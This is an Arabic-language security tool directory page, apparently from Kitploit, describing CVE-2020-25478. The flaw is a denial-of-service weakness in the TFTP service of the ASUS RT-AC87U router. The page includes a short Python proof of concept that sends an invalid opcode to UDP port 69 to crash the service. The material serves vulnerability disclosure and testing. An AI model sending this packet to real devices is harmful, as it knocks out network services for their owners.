Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP معرضة لهجوم حجب الخدمة (DoS) | Kitploit
أدوات/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
تحليل الثغرات الأمنيةالاستغلالالاختبار العشوائيأمان الأجهزة وإنترنت الأشياء
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP معرضة لهجوم حجب الخدمة (DoS)

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 3 سنواتلم تتم المراجعة بعد

ASUS-RT-AC87U-TFTP عرضة لهجوم رفض الخدمة (DoS)

CVE-2020-25478 - ASUS RT-AC87U TFTP عرضة لهجوم رفض الخدمة (DoS)

  1. اسم المنتج (المنتجات) المتأثر والإصدارات

ASUS RT-AC87U 3.0.0.4.382_51640

  1. نوع المشكلة

يتعلق بشكل أساسي بـ CWE-20، خدمة TFTP التي تعمل على ASUS RT-AC87U عرضة لهجوم رفض الخدمة (DoS) عند إرسال رمز عملية غير صالح إلى الخدمة. يستخدم مقتطف كود Python التالي لاختبار الثغرة:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. الوصف

جهاز Asus RT-AC87U الإصدار 3.0.0.4.382_51640 عرضة لهجوم رفض الخدمة على خدمة TFTP مما يتسبب في تعطل خدمة TFTP. خدمة TFTP معرضة للتعطل عن بُعد عن طريق إرسال رمز عملية غير صالح.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

تنزيل الأداة